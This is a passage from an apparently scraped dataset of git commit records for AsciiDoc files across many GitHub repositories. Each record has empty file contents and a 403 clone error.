der\/spring-boot,xiaoleiPENG\/my-project,bjornlindstrom\/spring-boot,joshthornhill\/spring-boot,wilkinsona\/spring-boot,Buzzardo\/spring-boot,yhj630520\/spring-boot,ollie314\/spring-boot,jbovet\/spring-boot,minmay\/spring-boot,nebhale\/spring-boot,rweisleder\/spring-boot,lburgazzoli\/spring-boot,DeezCashews\/spring-boot,shangyi0102\/spring-boot,shangyi0102\/spring-boot,philwebb\/spring-boot,lexandro\/spring-boot,hello2009chen\/spring-boot,bclozel\/spring-boot,joshthornhill\/spring-boot,royclarkson\/spring-boot,jbovet\/spring-boot,michael-simons\/spring-boot,herau\/spring-boot,xiaoleiPENG\/my-project,kamilszymanski\/spring-boot,mosoft521\/spring-boot,olivergierke\/spring-boot,javyzheng\/spring-boot,zhanhb\/spring-boot,SaravananParthasarathy\/SPSDemo,jxblum\/spring-boot,shangyi0102\/spring-boot,candrews\/spring-boot,jayarampradhan\/spring-boot,zhanhb\/spring-boot,afroje-reshma\/spring-boot-sample,yhj630520\/spring-boot,eddumelendez\/spring-boot,vakninr\/spring-boot,candrews\/spring-boot,mosoft521\/spring-boot,afroje-reshma\/spring-boot-sample,NetoDevel\/spring-boot,joshthornhill\/spring-boot,izeye\/spring-boot,bbrouwer\/spring-boot,bbrouwer\/spring-boot,isopov\/spring-boot,jxblum\/spring-boot,shakuzen\/spring-boot,thomasdarimont\/spring-boot,izeye\/spring-boot,mbogoevici\/spring-boot,tiarebalbi\/spring-boot,jbovet\/spring-boot,rweisleder\/spring-boot,jmnarloch\/spring-boot,DeezCashews\/spring-boot,jxblum\/spring-boot,rweisleder\/spring-boot,ihoneymon\/spring-boot,scottfrederick\/spring-boot,jxblum\/spring-boot,thomasdarimont\/spring-boot,shakuzen\/spring-boot,hello2009chen\/spring-boot,eddumelendez\/spring-boot,lexandro\/spring-boot,bbrouwer\/spring-boot,lexandro\/spring-boot,chrylis\/spring-boot,olivergierke\/spring-boot,mdeinum\/spring-boot,SaravananParthasarathy\/SPSDemo,zhanhb\/spring-boot,sebastiankirsch\/spring-boot,cleverjava\/jenkins2-course-spring-boot,vpavic\/spring-boot,michael-simons\/spring-boot,chrylis\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot,ptahchiev\/spring-boot,pvorb\/spring-boot,lucassaldanha\/spring-boot,kdvolder\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,nebhale\/spring-boot,joshthornhill\/spring-boot,i007422\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,DeezCashews\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mosoft521\/spring-boot,kdvolder\/spring-boot,lexandro\/spring-boot,jayarampradhan\/spring-boot,yangdd1205\/spring-boot,lburgazzoli\/spring-boot,michael-simons\/spring-boot,pvorb\/spring-boot,shakuzen\/spring-boot,ilayaperumalg\/spring-boot,olivergierke\/spring-boot,jbovet\/spring-boot,mdeinum\/spring-boot,ilayaperumalg\/spring-boot,ptahchiev\/spring-boot,ihoneymon\/spring-boot,joshiste\/spring-boot,jvz\/spring-boot,qerub\/spring-boot,izeye\/spring-boot,deki\/spring-boot,royclarkson\/spring-boot,mdeinum\/spring-boot,felipeg48\/spring-boot,felipeg48\/spring-boot,dreis2211\/spring-boot,jvz\/spring-boot,joshiste\/spring-boot,joshiste\/spring-boot,hqrt\/jenkins2-course-spring-boot,RichardCSantana\/spring-boot,joshiste\/spring-boot,lexandro\/spring-boot,scottfrederick\/spring-boot,habuma\/spring-boot,ihoneymon\/spring-boot,bjornlindstrom\/spring-boot,mbogoevici\/spring-boot,ilayaperumalg\/spring-boot,xiaoleiPENG\/my-project,qerub\/spring-boot,hqrt\/jenkins2-course-spring-boot,vpavic\/spring-boot,spring-projects\/spring-boot,linead\/spring-boot,akmaharshi\/jenkins,vakninr\/spring-boot,lucassaldanha\/spring-boot,bijukunjummen\/spring-boot,eddumelendez\/spring-boot,philwebb\/spring-boot,vakninr\/spring-boot,spring-projects\/spring-boot,htynkn\/spring-boot,deki\/spring-boot,shangyi0102\/spring-boot,tiarebalbi\/spring-boot,candrews\/spring-boot,michael-simons\/spring-boot,javyzheng\/spring-boot,afroje-reshma\/spring-boot-sample,vpavic\/spring-boot,Buzzardo\/spring-boot,mdeinum\/spring-boot,SaravananParthasarathy\/SPSDemo,qerub\/spring-boot,bclozel\/spring-boot,bbrouwer\/spring-boot,chrylis\/spring-boot,drumonii\/spring-boot,afroje-reshma\/spring-boot-sample,donhuvy\/spring-boot,herau\/spring-boot,isopov\/spring-boot,michael-simons\/spring-boot,pvorb\/spring-boot,mbenson\/spring-boot,eddumelendez\/spring-boot,brettwooldridge\/spring-boot,sbcoba\/spring-boot,i007422\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,xiaoleiPENG\/my-project,habuma\/spring-boot,jvz\/spring-boot,afroje-reshma\/spring-boot-sample,tsachev\/spring-boot,aahlenst\/spring-boot,sebastiankirsch\/spring-boot,lucassaldanha\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,SaravananParthasarathy\/SPSDemo,spring-projects\/spring-boot,sebastiankirsch\/spring-boot,kdvolder\/spring-boot,pvorb\/spring-boot,drumonii\/spring-boot,shakuzen\/spring-boot,NetoDevel\/spring-boot,royclarkson\/spring-boot,linead\/spring-boot,sbcoba\/spring-boot,lburgazzoli\/spring-boot,bbrouwer\/spring-boot,felipeg48\/spring-boot,mbogoevici\/spring-boot,rweisleder\/spring-boot,shangyi0102\/spring-boot,candrews\/spring-boot,jmnarloch\/spring-boot,bijukunjummen\/spring-boot,mbenson\/spring-boot,ilayaperumalg\/spring-boot,eddumelendez\/spring-boot,scottfrederick\/spring-boot,Nowheresly\/spring-boot,hello2009chen\/spring-boot,drumonii\/spring-boot,vakninr\/spring-boot,olivergierke\/spring-boot,DeezCashews\/spring-boot,scottfrederick\/spring-boot","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"608689383eb56902d0a0fa0caffd201f65061bce","subject":"Update 2015-09-23-.adoc","message":"Update 2015-09-23-.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-23-.adoc","new_file":"_posts\/2015-09-23-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7fcace39ad222da77f04e759ab0c93bc0dbd6dc","subject":"Update 2015-10-21-.adoc","message":"Update 2015-10-21-.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-10-21-.adoc","new_file":"_posts\/2015-10-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccebd0acb54c0ca6d72e9d1d34f4895ec76bd225","subject":"Remove `include` directive","message":"Remove `include` directive\n","repos":"spodin\/algorithms","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spodin\/algorithms.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"800cb7d7965e7277d5a1534ffd97c7066a3ce78a","subject":"Updated documentation","message":"Updated documentation","repos":"mehtabsinghmann\/resilience4j,RobWin\/javaslang-circuitbreaker,goldobin\/resilience4j,RobWin\/circuitbreaker-java8,drmaas\/resilience4j,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,resilience4j\/resilience4j,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cba6ee72d5cd44d05789d38527d23fa05546f4c0","subject":"added readme","message":"added readme\n","repos":"m-m-m\/game,ghosthopper\/ghosthopper","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/game.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c65754d3614862a7a07ebba67e3faa13ba883691","subject":"Now hosted on GitLab","message":"Now hosted on GitLab\n\nSigned-off-by: Sebastian Davids <ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-entity,sdavids\/sdavids-commons-entity","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-entity.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1111417cb606f30dbdb4ce66e38c1f33fb28e56a","subject":"readme added.","message":"readme added.\n","repos":"hivemq\/hivemq-sys-topic-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hivemq\/hivemq-sys-topic-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"574ad264ea0cfd54430818b9ac9e30cc7db3fa07","subject":"ENTESB-8082 - add top level readme","message":"ENTESB-8082 - add top level readme\n","repos":"jboss-fuse\/fuse-karaf,jboss-fuse\/fuse-karaf,jboss-fuse\/fuse-karaf","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jboss-fuse\/fuse-karaf.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e19b49f61454ba2366a682636919e295a8516689","subject":"y2b create post $10,000 Ultimate Setup Giveaway!","message":"y2b create post $10,000 Ultimate Setup Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-09-09-10000-Ultimate-Setup-Giveaway.adoc","new_file":"_posts\/2015-09-09-10000-Ultimate-Setup-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"035983696ce9685fe47653cd46c4146763af39d0","subject":"Update 2015-09-14-Ruby-on-Rails-Material-Design.adoc","message":"Update 2015-09-14-Ruby-on-Rails-Material-Design.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-09-14-Ruby-on-Rails-Material-Design.adoc","new_file":"_posts\/2015-09-14-Ruby-on-Rails-Material-Design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eddda53924f3bdc9b965af1e61e3c152c971795c","subject":"Update 2015-09-29-AWS-ChinaBeijing-Region-Tips.adoc","message":"Update 2015-09-29-AWS-ChinaBeijing-Region-Tips.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-09-29-AWS-ChinaBeijing-Region-Tips.adoc","new_file":"_posts\/2015-09-29-AWS-ChinaBeijing-Region-Tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd1b830fc61526523f292869ee5e2355a1d55efd","subject":"y2b create post World's First Unboxing in 360","message":"y2b create post World's First Unboxing in 360","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-19-Worlds-First-Unboxing-in-360.adoc","new_file":"_posts\/2016-05-19-Worlds-First-Unboxing-in-360.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74636e6b72643822c69c60aa66067320769c6384","subject":"Update 2017-09-13-Part-0-Introducing-SP-A.adoc","message":"Update 2017-09-13-Part-0-Introducing-SP-A.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2017-09-13-Part-0-Introducing-SP-A.adoc","new_file":"_posts\/2017-09-13-Part-0-Introducing-SP-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"814e1d1c5a25eaa9e9bb7e9aa6c250c7207c672e","subject":"Update 2016-04-25-Butter-Knife-y-los-dialogos.adoc","message":"Update 2016-04-25-Butter-Knife-y-los-dialogos.adoc","repos":"carlosdominguezmartin\/carlosdominguezmartin.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io","old_file":"_posts\/2016-04-25-Butter-Knife-y-los-dialogos.adoc","new_file":"_posts\/2016-04-25-Butter-Knife-y-los-dialogos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlosdominguezmartin\/carlosdominguezmartin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03c3bd1bf21e7cdbf980c35b91dfd6b623b85b12","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07097e12cfbd0fd2189093429fc962855322d0f9","subject":"Draft of modules post","message":"Draft of modules post\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-07-14-code-splitting.adoc","new_file":"content\/news\/2017-07-14-code-splitting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2567627de8dcfda816bfceef76b582a779bf34f9","subject":":global-exports post","message":":global-exports post\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-07-30-global-exports.adoc","new_file":"content\/news\/2017-07-30-global-exports.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"6dacb50b043317d7ac30e1b0b1b8fa0da61c1c40","subject":"Link formatter settings","message":"Link formatter settings\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93d3e37969a44cd976fc78a8509327d7227a3060","subject":"Apiman offline blog","message":"Apiman offline blog\n","repos":"apiman\/apiman.github.io,kahboom\/apiman.github.io,kahboom\/apiman.github.io,msavy\/apiman.github.io,apiman\/apiman.github.io,kahboom\/apiman.github.io,msavy\/apiman.github.io,apiman\/apiman.github.io,kahboom\/apiman.github.io,msavy\/apiman.github.io,apiman\/apiman.github.io,msavy\/apiman.github.io","old_file":"_blog-src\/_posts\/2016-04-04-locked-down-network.adoc","new_file":"_blog-src\/_posts\/2016-04-04-locked-down-network.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kahboom\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"84164ad81c9d50567403f9ca2ded214e76f30271","subject":"Update 2017-08-11-Bai-viet-thu-nghiem-Hubpress.adoc","message":"Update 2017-08-11-Bai-viet-thu-nghiem-Hubpress.adoc","repos":"kimkha-blog\/kimkha-blog.github.io,kimkha-blog\/kimkha-blog.github.io,kimkha-blog\/kimkha-blog.github.io,kimkha-blog\/kimkha-blog.github.io","old_file":"_posts\/2017-08-11-Bai-viet-thu-nghiem-Hubpress.adoc","new_file":"_posts\/2017-08-11-Bai-viet-thu-nghiem-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kimkha-blog\/kimkha-blog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97de4eefc1885db706c6978d4152a2ccbbc10947","subject":"Update 2018-12-25-Akamai-Site-Shield-Terraform.adoc","message":"Update 2018-12-25-Akamai-Site-Shield-Terraform.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-25-Akamai-Site-Shield-Terraform.adoc","new_file":"_posts\/2018-12-25-Akamai-Site-Shield-Terraform.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"731e6a9a8ffbfdd3658483090dbb7b5c605070e1","subject":"Update 2016-06-30-Goldilocks-Microservices.adoc","message":"Update 2016-06-30-Goldilocks-Microservices.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-06-30-Goldilocks-Microservices.adoc","new_file":"_posts\/2016-06-30-Goldilocks-Microservices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af3f734f4a04fc85e8f014b4f4f259105824ead8","subject":"Update 2016-11-09-181200-Wednesday-Workday.adoc","message":"Update 2016-11-09-181200-Wednesday-Workday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-09-181200-Wednesday-Workday.adoc","new_file":"_posts\/2016-11-09-181200-Wednesday-Workday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95e1c3ada31fd8dfd9401ea1c3fa6037079b9203","subject":"add clojureD 2017","message":"add clojureD 2017\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojured.adoc","new_file":"content\/events\/2017\/clojured.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c2f04bb24996981aee53666a7cc810e14b5b7048","subject":"Publish 2017-0331-Die-sechs-Vermeidungen-des-Menschen.adoc","message":"Publish 2017-0331-Die-sechs-Vermeidungen-des-Menschen.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"2017-0331-Die-sechs-Vermeidungen-des-Menschen.adoc","new_file":"2017-0331-Die-sechs-Vermeidungen-des-Menschen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abbe950be8b3b4f6adbe0682deb79892995d2c63","subject":"Add tutorial.adoc","message":"Add tutorial.adoc\n","repos":"juxt\/edge,juxt\/edge","old_file":"doc\/resources\/doc\/sources\/tutorial.adoc","new_file":"doc\/resources\/doc\/sources\/tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juxt\/edge.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"523c7e1d7edc970818202237e0024ba9f90eefad","subject":"Update 2016-04-20-domainhack-angularjs.adoc","message":"Update 2016-04-20-domainhack-angularjs.adoc","repos":"redrabbit-calligraphy\/redrabbit-calligraphy-blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog","old_file":"_posts\/2016-04-20-domainhack-angularjs.adoc","new_file":"_posts\/2016-04-20-domainhack-angularjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redrabbit-calligraphy\/redrabbit-calligraphy-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bae10829bafb46e5a1abf4e7eb42fde352d6f0c3","subject":"Add the missing listeners guide chapter","message":"Add the missing listeners guide chapter\n\nWhile incomplete it's still a pretty good start.\n","repos":"rabbitmq\/cowboy,CrankWheel\/cowboy,kivra\/cowboy,K2InformaticsGmbH\/cowboy,hairyhum\/cowboy,bsmr-erlang\/cowboy,turtleDeng\/cowboy,ninenines\/cowboy","old_file":"doc\/src\/guide\/listeners.asciidoc","new_file":"doc\/src\/guide\/listeners.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rabbitmq\/cowboy.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"3e96dee8ca9fdfe8037ab64e6320d43ace2b175c","subject":"y2b create post The Super MacBook Pro Upgrade (1TB RAID SSD Upgrade + RAM Upgrade 2013)","message":"y2b create post The Super MacBook Pro Upgrade (1TB RAID SSD Upgrade + RAM Upgrade 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-29-The-Super-MacBook-Pro-Upgrade-1TB-RAID-SSD-Upgrade--RAM-Upgrade-2013.adoc","new_file":"_posts\/2013-06-29-The-Super-MacBook-Pro-Upgrade-1TB-RAID-SSD-Upgrade--RAM-Upgrade-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d09c35b7257c7ffb788b9a8d4cd56374fed5ca9b","subject":"Update 2019-01-31-My-Alt-English-Title.adoc","message":"Update 2019-01-31-My-Alt-English-Title.adoc","repos":"ml4den\/hubpress,ml4den\/hubpress,ml4den\/hubpress,ml4den\/hubpress","old_file":"_posts\/2019-01-31-My-Alt-English-Title.adoc","new_file":"_posts\/2019-01-31-My-Alt-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ml4den\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"197749b9cb7f43daaec136df384a86f8ee0b0e8e","subject":"Minor updates based on answers from Raman","message":"Minor updates based on answers from Raman\n","repos":"EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST","old_file":"lab\/new-topic.adoc","new_file":"lab\/new-topic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMCWorld\/2015-REST.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"34aa37e3d6d751300ba680e7661efc8c9bbb2cdb","subject":"Added list of changes in YANG 1.1","message":"Added list of changes in YANG 1.1\n\nChange-Id: Ifc3baeea73b47a1110ba463050b2c10a901e3a35\nSigned-off-by: Tony Tkacik <d0658a876d3f3373fb5ecec624b553a76d54e737@cisco.com>\n","repos":"opendaylight\/yangtools,opendaylight\/yangtools","old_file":"docs\/analysis\/yang-1-1.adoc","new_file":"docs\/analysis\/yang-1-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opendaylight\/yangtools.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"cc32031f3b9b80b0786c88714e5399b70ba6e269","subject":"Update 2015-07-13-A-propos-de-nous.adoc","message":"Update 2015-07-13-A-propos-de-nous.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-07-13-A-propos-de-nous.adoc","new_file":"_posts\/2015-07-13-A-propos-de-nous.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efb746000c26c85a6dcf68575c676a961c78de48","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99c4dc495db66ed24a10c409feb107f60442fc13","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47eb8fcca4e09d38267776be7f70ebff97f4a291","subject":"Deleted _posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","message":"Deleted _posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e8eb2fd6528ca681223299f3201ce7c6e9009b5","subject":"Update 2016-06-23.adoc","message":"Update 2016-06-23.adoc","repos":"realraindust\/realraindust.github.io,realraindust\/realraindust.github.io,realraindust\/realraindust.github.io,realraindust\/realraindust.github.io","old_file":"_posts\/2016-06-23.adoc","new_file":"_posts\/2016-06-23.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/realraindust\/realraindust.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"623beede12712256e66ccdb131680def3d8ccc54","subject":"Update 2017-05-28.adoc","message":"Update 2017-05-28.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2017-05-28.adoc","new_file":"_posts\/2017-05-28.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbe2de0891ecd14207cbd91bc89f4cddcd4b72d9","subject":"[DOCS] Fixed callout reference error.","message":"[DOCS] Fixed callout reference 